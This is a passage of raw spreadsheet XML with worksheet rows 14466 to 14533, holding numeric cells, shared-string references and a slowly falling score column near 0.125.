        <v>15148.0</v>
      </c>
      <c r="B14466" s="2">
        <v>4.1954731E7</v>
      </c>
      <c r="C14466" s="2" t="s">
        <v>13940</v>
      </c>
      <c r="D14466" s="2">
        <v>1.0</v>
      </c>
      <c r="E14466" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14466" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="14467" ht="15.75" customHeight="1">
      <c r="A14467" s="1">
        <v>10702.0</v>
      </c>
      <c r="B14467" s="2">
        <v>1.489486E7</v>
      </c>
      <c r="C14467" s="2" t="s">
        <v>13941</v>
      </c>
      <c r="D14467" s="2">
        <v>1.0</v>
      </c>
      <c r="E14467" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14467" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14468" ht="15.75" customHeight="1">
      <c r="A14468" s="1">
        <v>13386.0</v>
      </c>
      <c r="B14468" s="2">
        <v>3.4932766E7</v>
      </c>
      <c r="C14468" s="2" t="s">
        <v>13942</v>
      </c>
      <c r="D14468" s="2">
        <v>1.0</v>
      </c>
      <c r="E14468" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14468" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14469" ht="15.75" customHeight="1">
      <c r="A14469" s="1">
        <v>14728.0</v>
      </c>
      <c r="B14469" s="2">
        <v>4.067518E7</v>
      </c>
      <c r="C14469" s="2" t="s">
        <v>13943</v>
      </c>
      <c r="D14469" s="2">
        <v>1.0</v>
      </c>
      <c r="E14469" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14469" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14470" ht="15.75" customHeight="1">
      <c r="A14470" s="1">
        <v>14835.0</v>
      </c>
      <c r="B14470" s="2">
        <v>4.1022529E7</v>
      </c>
      <c r="C14470" s="2" t="s">
        <v>13944</v>
      </c>
      <c r="D14470" s="2">
        <v>1.0</v>
      </c>
      <c r="E14470" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14470" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14471" ht="15.75" customHeight="1">
      <c r="A14471" s="1">
        <v>15526.0</v>
      </c>
      <c r="B14471" s="2">
        <v>4.3294046E7</v>
      </c>
      <c r="C14471" s="2" t="s">
        <v>13945</v>
      </c>
      <c r="D14471" s="2">
        <v>1.0</v>
      </c>
      <c r="E14471" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14471" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14472" ht="15.75" customHeight="1">
      <c r="A14472" s="1">
        <v>19854.0</v>
      </c>
      <c r="B14472" s="2">
        <v>5.7151182E7</v>
      </c>
      <c r="C14472" s="2" t="s">
        <v>13946</v>
      </c>
      <c r="D14472" s="2">
        <v>1.0</v>
      </c>
      <c r="E14472" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14472" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14473" ht="15.75" customHeight="1">
      <c r="A14473" s="1">
        <v>32402.0</v>
      </c>
      <c r="B14473" s="2">
        <v>5627572.0</v>
      </c>
      <c r="C14473" s="2" t="s">
        <v>13947</v>
      </c>
      <c r="D14473" s="2">
        <v>1.0</v>
      </c>
      <c r="E14473" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14473" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14474" ht="15.75" customHeight="1">
      <c r="A14474" s="1">
        <v>34194.0</v>
      </c>
      <c r="B14474" s="2">
        <v>9974330.0</v>
      </c>
      <c r="C14474" s="2" t="s">
        <v>13948</v>
      </c>
      <c r="D14474" s="2">
        <v>1.0</v>
      </c>
      <c r="E14474" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14474" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="14475" ht="15.75" customHeight="1">
      <c r="A14475" s="1">
        <v>15441.0</v>
      </c>
      <c r="B14475" s="2">
        <v>4.3002696E7</v>
      </c>
      <c r="C14475" s="2" t="s">
        <v>13949</v>
      </c>
      <c r="D14475" s="2">
        <v>1.0</v>
      </c>
      <c r="E14475" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14475" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="14476" ht="15.75" customHeight="1">
      <c r="A14476" s="1">
        <v>16728.0</v>
      </c>
      <c r="B14476" s="2">
        <v>4.7497307E7</v>
      </c>
      <c r="C14476" s="2" t="s">
        <v>13950</v>
      </c>
      <c r="D14476" s="2">
        <v>1.0</v>
      </c>
      <c r="E14476" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14476" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="14477" ht="15.75" customHeight="1">
      <c r="A14477" s="1">
        <v>17545.0</v>
      </c>
      <c r="B14477" s="2">
        <v>5.0150676E7</v>
      </c>
      <c r="C14477" s="2" t="s">
        <v>13951</v>
      </c>
      <c r="D14477" s="2">
        <v>1.0</v>
      </c>
      <c r="E14477" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14477" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="14478" ht="15.75" customHeight="1">
      <c r="A14478" s="1">
        <v>32944.0</v>
      </c>
      <c r="B14478" s="2">
        <v>6472348.0</v>
      </c>
      <c r="C14478" s="2" t="s">
        <v>13903</v>
      </c>
      <c r="D14478" s="2">
        <v>1.0</v>
      </c>
      <c r="E14478" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14478" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="14479" ht="15.75" customHeight="1">
      <c r="A14479" s="1">
        <v>1461.0</v>
      </c>
      <c r="B14479" s="2">
        <v>2.690009E7</v>
      </c>
      <c r="C14479" s="2" t="s">
        <v>13952</v>
      </c>
      <c r="D14479" s="2">
        <v>1.0</v>
      </c>
      <c r="E14479" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14479" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="14480" ht="15.75" customHeight="1">
      <c r="A14480" s="1">
        <v>1736.0</v>
      </c>
      <c r="B14480" s="2">
        <v>2.8784338E7</v>
      </c>
      <c r="C14480" s="2" t="s">
        <v>13953</v>
      </c>
      <c r="D14480" s="2">
        <v>1.0</v>
      </c>
      <c r="E14480" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14480" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="14481" ht="15.75" customHeight="1">
      <c r="A14481" s="1">
        <v>2104.0</v>
      </c>
      <c r="B14481" s="2">
        <v>3.1306425E7</v>
      </c>
      <c r="C14481" s="2" t="s">
        <v>13954</v>
      </c>
      <c r="D14481" s="2">
        <v>1.0</v>
      </c>
      <c r="E14481" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14481" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="14482" ht="15.75" customHeight="1">
      <c r="A14482" s="1">
        <v>6391.0</v>
      </c>
      <c r="B14482" s="2">
        <v>4.8452994E7</v>
      </c>
      <c r="C14482" s="2" t="s">
        <v>13955</v>
      </c>
      <c r="D14482" s="2">
        <v>1.0</v>
      </c>
      <c r="E14482" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14482" s="2">
        <v>0.1261904761904762</v>
      </c>
    </row>
    <row r="14483" ht="15.75" customHeight="1">
      <c r="A14483" s="1">
        <v>11284.0</v>
      </c>
      <c r="B14483" s="2">
        <v>2.0794564E7</v>
      </c>
      <c r="C14483" s="2" t="s">
        <v>13956</v>
      </c>
      <c r="D14483" s="2">
        <v>1.0</v>
      </c>
      <c r="E14483" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14483" s="2">
        <v>0.1261904761904762</v>
      </c>
    </row>
    <row r="14484" ht="15.75" customHeight="1">
      <c r="A14484" s="1">
        <v>6170.0</v>
      </c>
      <c r="B14484" s="2">
        <v>4.7886995E7</v>
      </c>
      <c r="C14484" s="2" t="s">
        <v>13957</v>
      </c>
      <c r="D14484" s="2">
        <v>1.0</v>
      </c>
      <c r="E14484" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14484" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="14485" ht="15.75" customHeight="1">
      <c r="A14485" s="1">
        <v>3174.0</v>
      </c>
      <c r="B14485" s="2">
        <v>3.7091634E7</v>
      </c>
      <c r="C14485" s="2" t="s">
        <v>13958</v>
      </c>
      <c r="D14485" s="2">
        <v>1.0</v>
      </c>
      <c r="E14485" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14485" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="14486" ht="15.75" customHeight="1">
      <c r="A14486" s="1">
        <v>8170.0</v>
      </c>
      <c r="B14486" s="2">
        <v>5.322474E7</v>
      </c>
      <c r="C14486" s="2" t="s">
        <v>13959</v>
      </c>
      <c r="D14486" s="2">
        <v>1.0</v>
      </c>
      <c r="E14486" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14486" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="14487" ht="15.75" customHeight="1">
      <c r="A14487" s="1">
        <v>9079.0</v>
      </c>
      <c r="B14487" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C14487" s="2" t="s">
        <v>13960</v>
      </c>
      <c r="D14487" s="2">
        <v>1.0</v>
      </c>
      <c r="E14487" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14487" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="14488" ht="15.75" customHeight="1">
      <c r="A14488" s="1">
        <v>12945.0</v>
      </c>
      <c r="B14488" s="2">
        <v>3.2375855E7</v>
      </c>
      <c r="C14488" s="2" t="s">
        <v>13961</v>
      </c>
      <c r="D14488" s="2">
        <v>1.0</v>
      </c>
      <c r="E14488" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14488" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="14489" ht="15.75" customHeight="1">
      <c r="A14489" s="1">
        <v>15260.0</v>
      </c>
      <c r="B14489" s="2">
        <v>4.2306631E7</v>
      </c>
      <c r="C14489" s="2" t="s">
        <v>13962</v>
      </c>
      <c r="D14489" s="2">
        <v>1.0</v>
      </c>
      <c r="E14489" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14489" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="14490" ht="15.75" customHeight="1">
      <c r="A14490" s="1">
        <v>16982.0</v>
      </c>
      <c r="B14490" s="2">
        <v>4.8321833E7</v>
      </c>
      <c r="C14490" s="2" t="s">
        <v>13963</v>
      </c>
      <c r="D14490" s="2">
        <v>1.0</v>
      </c>
      <c r="E14490" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14490" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="14491" ht="15.75" customHeight="1">
      <c r="A14491" s="1">
        <v>26144.0</v>
      </c>
      <c r="B14491" s="2">
        <v>1.6039151E7</v>
      </c>
      <c r="C14491" s="2" t="s">
        <v>13964</v>
      </c>
      <c r="D14491" s="2">
        <v>1.0</v>
      </c>
      <c r="E14491" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14491" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="14492" ht="15.75" customHeight="1">
      <c r="A14492" s="1">
        <v>5644.0</v>
      </c>
      <c r="B14492" s="2">
        <v>4.6264955E7</v>
      </c>
      <c r="C14492" s="2" t="s">
        <v>13965</v>
      </c>
      <c r="D14492" s="2">
        <v>1.0</v>
      </c>
      <c r="E14492" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14492" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="14493" ht="15.75" customHeight="1">
      <c r="A14493" s="1">
        <v>1570.0</v>
      </c>
      <c r="B14493" s="2">
        <v>2.7658953E7</v>
      </c>
      <c r="C14493" s="2" t="s">
        <v>13966</v>
      </c>
      <c r="D14493" s="2">
        <v>1.0</v>
      </c>
      <c r="E14493" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14493" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14494" ht="15.75" customHeight="1">
      <c r="A14494" s="1">
        <v>2659.0</v>
      </c>
      <c r="B14494" s="2">
        <v>3.4699121E7</v>
      </c>
      <c r="C14494" s="2" t="s">
        <v>13967</v>
      </c>
      <c r="D14494" s="2">
        <v>1.0</v>
      </c>
      <c r="E14494" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14494" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14495" ht="15.75" customHeight="1">
      <c r="A14495" s="1">
        <v>3078.0</v>
      </c>
      <c r="B14495" s="2">
        <v>3.6559225E7</v>
      </c>
      <c r="C14495" s="2" t="s">
        <v>13968</v>
      </c>
      <c r="D14495" s="2">
        <v>1.0</v>
      </c>
      <c r="E14495" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14495" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14496" ht="15.75" customHeight="1">
      <c r="A14496" s="1">
        <v>3442.0</v>
      </c>
      <c r="B14496" s="2">
        <v>3.8238204E7</v>
      </c>
      <c r="C14496" s="2" t="s">
        <v>13969</v>
      </c>
      <c r="D14496" s="2">
        <v>1.0</v>
      </c>
      <c r="E14496" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14496" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14497" ht="15.75" customHeight="1">
      <c r="A14497" s="1">
        <v>6936.0</v>
      </c>
      <c r="B14497" s="2">
        <v>4.9901847E7</v>
      </c>
      <c r="C14497" s="2" t="s">
        <v>13970</v>
      </c>
      <c r="D14497" s="2">
        <v>1.0</v>
      </c>
      <c r="E14497" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14497" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14498" ht="15.75" customHeight="1">
      <c r="A14498" s="1">
        <v>7256.0</v>
      </c>
      <c r="B14498" s="2">
        <v>5.0729572E7</v>
      </c>
      <c r="C14498" s="2" t="s">
        <v>13971</v>
      </c>
      <c r="D14498" s="2">
        <v>1.0</v>
      </c>
      <c r="E14498" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14498" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14499" ht="15.75" customHeight="1">
      <c r="A14499" s="1">
        <v>7289.0</v>
      </c>
      <c r="B14499" s="2">
        <v>5.0798178E7</v>
      </c>
      <c r="C14499" s="2" t="s">
        <v>13972</v>
      </c>
      <c r="D14499" s="2">
        <v>1.0</v>
      </c>
      <c r="E14499" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14499" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14500" ht="15.75" customHeight="1">
      <c r="A14500" s="1">
        <v>7609.0</v>
      </c>
      <c r="B14500" s="2">
        <v>5.166434E7</v>
      </c>
      <c r="C14500" s="2" t="s">
        <v>13973</v>
      </c>
      <c r="D14500" s="2">
        <v>1.0</v>
      </c>
      <c r="E14500" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14500" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14501" ht="15.75" customHeight="1">
      <c r="A14501" s="1">
        <v>7984.0</v>
      </c>
      <c r="B14501" s="2">
        <v>5.2740945E7</v>
      </c>
      <c r="C14501" s="2" t="s">
        <v>13974</v>
      </c>
      <c r="D14501" s="2">
        <v>1.0</v>
      </c>
      <c r="E14501" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14501" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14502" ht="15.75" customHeight="1">
      <c r="A14502" s="1">
        <v>12124.0</v>
      </c>
      <c r="B14502" s="2">
        <v>2.6937463E7</v>
      </c>
      <c r="C14502" s="2" t="s">
        <v>13975</v>
      </c>
      <c r="D14502" s="2">
        <v>1.0</v>
      </c>
      <c r="E14502" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14502" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14503" ht="15.75" customHeight="1">
      <c r="A14503" s="1">
        <v>12749.0</v>
      </c>
      <c r="B14503" s="2">
        <v>3.1113532E7</v>
      </c>
      <c r="C14503" s="2" t="s">
        <v>13976</v>
      </c>
      <c r="D14503" s="2">
        <v>1.0</v>
      </c>
      <c r="E14503" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14503" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14504" ht="15.75" customHeight="1">
      <c r="A14504" s="1">
        <v>14262.0</v>
      </c>
      <c r="B14504" s="2">
        <v>3.8390159E7</v>
      </c>
      <c r="C14504" s="2" t="s">
        <v>13977</v>
      </c>
      <c r="D14504" s="2">
        <v>1.0</v>
      </c>
      <c r="E14504" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14504" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14505" ht="15.75" customHeight="1">
      <c r="A14505" s="1">
        <v>15054.0</v>
      </c>
      <c r="B14505" s="2">
        <v>4.1665039E7</v>
      </c>
      <c r="C14505" s="2" t="s">
        <v>13978</v>
      </c>
      <c r="D14505" s="2">
        <v>1.0</v>
      </c>
      <c r="E14505" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14505" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14506" ht="15.75" customHeight="1">
      <c r="A14506" s="1">
        <v>16972.0</v>
      </c>
      <c r="B14506" s="2">
        <v>4.8297569E7</v>
      </c>
      <c r="C14506" s="2" t="s">
        <v>13979</v>
      </c>
      <c r="D14506" s="2">
        <v>1.0</v>
      </c>
      <c r="E14506" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14506" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14507" ht="15.75" customHeight="1">
      <c r="A14507" s="1">
        <v>19042.0</v>
      </c>
      <c r="B14507" s="2">
        <v>5.4568858E7</v>
      </c>
      <c r="C14507" s="2" t="s">
        <v>13980</v>
      </c>
      <c r="D14507" s="2">
        <v>1.0</v>
      </c>
      <c r="E14507" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14507" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14508" ht="15.75" customHeight="1">
      <c r="A14508" s="1">
        <v>19524.0</v>
      </c>
      <c r="B14508" s="2">
        <v>5.5967281E7</v>
      </c>
      <c r="C14508" s="2" t="s">
        <v>13981</v>
      </c>
      <c r="D14508" s="2">
        <v>1.0</v>
      </c>
      <c r="E14508" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14508" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14509" ht="15.75" customHeight="1">
      <c r="A14509" s="1">
        <v>19756.0</v>
      </c>
      <c r="B14509" s="2">
        <v>5.6708295E7</v>
      </c>
      <c r="C14509" s="2" t="s">
        <v>13982</v>
      </c>
      <c r="D14509" s="2">
        <v>1.0</v>
      </c>
      <c r="E14509" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14509" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14510" ht="15.75" customHeight="1">
      <c r="A14510" s="1">
        <v>21834.0</v>
      </c>
      <c r="B14510" s="2">
        <v>2.7083559E7</v>
      </c>
      <c r="C14510" s="2" t="s">
        <v>13983</v>
      </c>
      <c r="D14510" s="2">
        <v>1.0</v>
      </c>
      <c r="E14510" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14510" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14511" ht="15.75" customHeight="1">
      <c r="A14511" s="1">
        <v>23071.0</v>
      </c>
      <c r="B14511" s="2">
        <v>5.0476235E7</v>
      </c>
      <c r="C14511" s="2" t="s">
        <v>13984</v>
      </c>
      <c r="D14511" s="2">
        <v>1.0</v>
      </c>
      <c r="E14511" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14511" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14512" ht="15.75" customHeight="1">
      <c r="A14512" s="1">
        <v>24405.0</v>
      </c>
      <c r="B14512" s="2">
        <v>1.0818613E7</v>
      </c>
      <c r="C14512" s="2" t="s">
        <v>13985</v>
      </c>
      <c r="D14512" s="2">
        <v>1.0</v>
      </c>
      <c r="E14512" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14512" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14513" ht="15.75" customHeight="1">
      <c r="A14513" s="1">
        <v>27096.0</v>
      </c>
      <c r="B14513" s="2">
        <v>2.0534544E7</v>
      </c>
      <c r="C14513" s="2" t="s">
        <v>13986</v>
      </c>
      <c r="D14513" s="2">
        <v>1.0</v>
      </c>
      <c r="E14513" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14513" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14514" ht="15.75" customHeight="1">
      <c r="A14514" s="1">
        <v>27298.0</v>
      </c>
      <c r="B14514" s="2">
        <v>2.1306947E7</v>
      </c>
      <c r="C14514" s="2" t="s">
        <v>13987</v>
      </c>
      <c r="D14514" s="2">
        <v>1.0</v>
      </c>
      <c r="E14514" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14514" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14515" ht="15.75" customHeight="1">
      <c r="A14515" s="1">
        <v>28617.0</v>
      </c>
      <c r="B14515" s="2">
        <v>2.7165448E7</v>
      </c>
      <c r="C14515" s="2" t="s">
        <v>13988</v>
      </c>
      <c r="D14515" s="2">
        <v>1.0</v>
      </c>
      <c r="E14515" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14515" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14516" ht="15.75" customHeight="1">
      <c r="A14516" s="1">
        <v>32290.0</v>
      </c>
      <c r="B14516" s="2">
        <v>5546227.0</v>
      </c>
      <c r="C14516" s="2" t="s">
        <v>13989</v>
      </c>
      <c r="D14516" s="2">
        <v>1.0</v>
      </c>
      <c r="E14516" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14516" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14517" ht="15.75" customHeight="1">
      <c r="A14517" s="1">
        <v>32992.0</v>
      </c>
      <c r="B14517" s="2">
        <v>6607458.0</v>
      </c>
      <c r="C14517" s="2" t="s">
        <v>13990</v>
      </c>
      <c r="D14517" s="2">
        <v>1.0</v>
      </c>
      <c r="E14517" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14517" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="14518" ht="15.75" customHeight="1">
      <c r="A14518" s="1">
        <v>13903.0</v>
      </c>
      <c r="B14518" s="2">
        <v>3.7070186E7</v>
      </c>
      <c r="C14518" s="2" t="s">
        <v>13991</v>
      </c>
      <c r="D14518" s="2">
        <v>1.0</v>
      </c>
      <c r="E14518" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14518" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="14519" ht="15.75" customHeight="1">
      <c r="A14519" s="1">
        <v>19604.0</v>
      </c>
      <c r="B14519" s="2">
        <v>5.618341E7</v>
      </c>
      <c r="C14519" s="2" t="s">
        <v>13992</v>
      </c>
      <c r="D14519" s="2">
        <v>1.0</v>
      </c>
      <c r="E14519" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14519" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="14520" ht="15.75" customHeight="1">
      <c r="A14520" s="1">
        <v>23947.0</v>
      </c>
      <c r="B14520" s="2">
        <v>8869836.0</v>
      </c>
      <c r="C14520" s="2" t="s">
        <v>13993</v>
      </c>
      <c r="D14520" s="2">
        <v>1.0</v>
      </c>
      <c r="E14520" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14520" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="14521" ht="15.75" customHeight="1">
      <c r="A14521" s="1">
        <v>26583.0</v>
      </c>
      <c r="B14521" s="2">
        <v>1.7943095E7</v>
      </c>
      <c r="C14521" s="2" t="s">
        <v>13994</v>
      </c>
      <c r="D14521" s="2">
        <v>1.0</v>
      </c>
      <c r="E14521" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14521" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="14522" ht="15.75" customHeight="1">
      <c r="A14522" s="1">
        <v>27316.0</v>
      </c>
      <c r="B14522" s="2">
        <v>2.137679E7</v>
      </c>
      <c r="C14522" s="2" t="s">
        <v>13995</v>
      </c>
      <c r="D14522" s="2">
        <v>1.0</v>
      </c>
      <c r="E14522" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14522" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="14523" ht="15.75" customHeight="1">
      <c r="A14523" s="1">
        <v>8403.0</v>
      </c>
      <c r="B14523" s="2">
        <v>5.3878398E7</v>
      </c>
      <c r="C14523" s="2" t="s">
        <v>13996</v>
      </c>
      <c r="D14523" s="2">
        <v>1.0</v>
      </c>
      <c r="E14523" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14523" s="2">
        <v>0.1252354048964219</v>
      </c>
    </row>
    <row r="14524" ht="15.75" customHeight="1">
      <c r="A14524" s="1">
        <v>17101.0</v>
      </c>
      <c r="B14524" s="2">
        <v>4.8682857E7</v>
      </c>
      <c r="C14524" s="2" t="s">
        <v>13997</v>
      </c>
      <c r="D14524" s="2">
        <v>1.0</v>
      </c>
      <c r="E14524" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14524" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="14525" ht="15.75" customHeight="1">
      <c r="A14525" s="1">
        <v>17552.0</v>
      </c>
      <c r="B14525" s="2">
        <v>5.0206307E7</v>
      </c>
      <c r="C14525" s="2" t="s">
        <v>13998</v>
      </c>
      <c r="D14525" s="2">
        <v>1.0</v>
      </c>
      <c r="E14525" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14525" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="14526" ht="15.75" customHeight="1">
      <c r="A14526" s="1">
        <v>19531.0</v>
      </c>
      <c r="B14526" s="2">
        <v>5.5978208E7</v>
      </c>
      <c r="C14526" s="2" t="s">
        <v>13999</v>
      </c>
      <c r="D14526" s="2">
        <v>1.0</v>
      </c>
      <c r="E14526" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14526" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="14527" ht="15.75" customHeight="1">
      <c r="A14527" s="1">
        <v>26270.0</v>
      </c>
      <c r="B14527" s="2">
        <v>1.6394276E7</v>
      </c>
      <c r="C14527" s="2" t="s">
        <v>14000</v>
      </c>
      <c r="D14527" s="2">
        <v>1.0</v>
      </c>
      <c r="E14527" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14527" s="2">
        <v>0.1250000000000001</v>
      </c>
    </row>
    <row r="14528" ht="15.75" customHeight="1">
      <c r="A14528" s="1">
        <v>4619.0</v>
      </c>
      <c r="B14528" s="2">
        <v>4.296391E7</v>
      </c>
      <c r="C14528" s="2" t="s">
        <v>14001</v>
      </c>
      <c r="D14528" s="2">
        <v>1.0</v>
      </c>
      <c r="E14528" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14528" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="14529" ht="15.75" customHeight="1">
      <c r="A14529" s="1">
        <v>9188.0</v>
      </c>
      <c r="B14529" s="2">
        <v>5.538062E7</v>
      </c>
      <c r="C14529" s="2" t="s">
        <v>14002</v>
      </c>
      <c r="D14529" s="2">
        <v>1.0</v>
      </c>
      <c r="E14529" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14529" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="14530" ht="15.75" customHeight="1">
      <c r="A14530" s="1">
        <v>4886.0</v>
      </c>
      <c r="B14530" s="2">
        <v>4.3865719E7</v>
      </c>
      <c r="C14530" s="2" t="s">
        <v>14003</v>
      </c>
      <c r="D14530" s="2">
        <v>1.0</v>
      </c>
      <c r="E14530" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14530" s="2">
        <v>0.1247987117552336</v>
      </c>
    </row>
    <row r="14531" ht="15.75" customHeight="1">
      <c r="A14531" s="1">
        <v>7410.0</v>
      </c>
      <c r="B14531" s="2">
        <v>5.112461E7</v>
      </c>
      <c r="C14531" s="2" t="s">
        <v>14004</v>
      </c>
      <c r="D14531" s="2">
        <v>1.0</v>
      </c>
      <c r="E14531" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14531" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="14532" ht="15.75" customHeight="1">
      <c r="A14532" s="1">
        <v>17648.0</v>
      </c>
      <c r="B14532" s="2">
        <v>5.0414453E7</v>
      </c>
      <c r="C14532" s="2" t="s">
        <v>14005</v>
      </c>
      <c r="D14532" s="2">
        <v>1.0</v>
      </c>
      <c r="E14532" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14532" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="14533" ht="15.75" customHeight="1">
      <c r="A14533" s="1">
        <v>3949.0</v>
      </c>
